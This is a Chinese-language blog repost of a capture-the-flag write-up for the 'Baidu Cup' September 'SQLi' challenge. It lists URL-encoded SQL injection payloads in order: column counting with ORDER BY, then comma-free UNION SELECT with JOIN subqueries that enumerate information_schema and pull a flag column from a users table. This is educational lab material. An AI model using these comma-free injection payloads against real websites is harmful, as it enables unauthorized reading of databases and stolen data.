我是靠谱客的博主 殷勤春天,最近开发中收集的这篇文章主要介绍“百度杯”CTF比赛 九月场 题目名称:SQLi 后台有获取flag的线索,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

“百度杯”CTF比赛 九月场 题目名称:SQLi 后台有获取flag的线索

    • 解题思路

解题思路

1. 具有SQL注入点连接:
http://c3084761df8c4b1c91ddf64fd8c2ed4f22bb2637d78e4132.changame.ichunqiu.com/l0gin.php?id

2. 逗号之后被截断了,使用无逗号注入mysql无逗号的注入技巧

3. 判断字段个数 (SQL语句出错时,id原样输出)
payload:

l0gin.php?id=1%27%20order%20by%202%20%23

在这里插入图片描述

order by 3 时就会报错。

4. 查询数据库名
采用join方式

l0gin.php?id=4%27 union select * from (select 1) a join (select group_concat(table_name) from information_schema.tables where table_schema=database()) b %23

在这里插入图片描述

5. 查询表名

l0gin.php?id=4%27 union select * from (select 1) a join (select GROUP_CONCAT(COLUMN_NAME) FROM information_schema.COLUMNS WHERE TABLE_NAME='users') b %23

在这里插入图片描述

6. flag

http://c3084761df8c4b1c91ddf64fd8c2ed4f22bb2637d78e4132.changame.ichunqiu.com/l0gin.php?id=4%27 union select * from (select 1) a join (select flag_9c861b688330 from users) b %23

在这里插入图片描述

最后

以上就是殷勤春天为你收集整理的“百度杯”CTF比赛 九月场 题目名称:SQLi 后台有获取flag的线索的全部内容,希望文章能够帮你解决“百度杯”CTF比赛 九月场 题目名称:SQLi 后台有获取flag的线索所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(74)

评论列表共有 0 条评论

立即
投稿
返回
顶部